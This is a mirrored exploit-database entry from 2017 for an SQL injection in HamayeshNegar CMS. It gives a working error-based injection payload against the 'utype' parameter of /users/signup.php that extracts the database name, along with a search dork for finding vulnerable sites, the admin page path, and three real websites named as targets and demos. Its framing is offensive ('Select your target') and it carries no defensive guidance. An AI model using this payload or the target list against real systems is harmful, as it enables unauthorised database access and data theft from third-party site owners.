Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090094

Below is a copy:

HamayeshNegar Cms >9.1.3 - SQL Injection# # # # # # #
# Exploit Title: HamayeshNegar Cms >9.1.3 - SQL Injection
# Dork: intext:"  (       ) "
# Date: 13.09.2017
# Vendor Homepage: http://www.hamayeshnegar.com/
# Version: >9.1.3
# Tested on: WiN8_x64/WiN10_x64/KaLiLinuX_x64
# # # # # # #
# Exploit Author: ArashHC
# Author Web: http://t.me/CyberSoldiersST
# Author Social: @ArashHC
# # # # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Search dork on google, Select your target
# My Target:
# http://veconf.com
# Inject /users/signup.php?utype=user at last of url
# utype parameter have SqlI bug
# For Export Database name:
# [Site]/users/signup.php?utype=user' and(select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by 2)b)--+
# 
# Admin Page:
#  [Site]/admin/
#
# For Find Target:
#  dork: intext:"  (       ) "
#  site: http://www.hamayeshnegar.com/counter.php
# Demos:
#  http://veconf.com
#  http://wse1.ir
#  http://contas96.ir
# # # # # # #
#
# Thanks to : EreBus, RexProg, JohnGH, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg
#
# https://t.me/CyberSoldiersST
#
# Discovered By: ArashHC
#
# # # # # # #

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.